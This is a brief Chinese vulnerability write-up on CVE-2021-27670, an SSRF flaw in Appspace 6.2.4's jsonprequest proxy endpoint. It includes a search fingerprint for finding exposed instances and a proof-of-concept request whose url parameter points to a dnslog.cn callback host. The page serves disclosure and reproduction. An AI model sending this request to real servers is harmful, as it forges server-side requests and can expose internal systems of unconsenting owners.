Appspace jsonprequest SSRF漏洞 #CVE-2021-27670

漏洞描述

Appspace 6.2.4存在漏洞,允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造,危害系统安全。

漏洞影响

Appspace 6.2.4

网络测绘

app=”Sign-in-to-Appspace-Core”

漏洞复现

登录页面为

20240425142920658-png (3)

验证POC

/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://lo2z02.dnslog.cn

20240425142948191-png (4)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容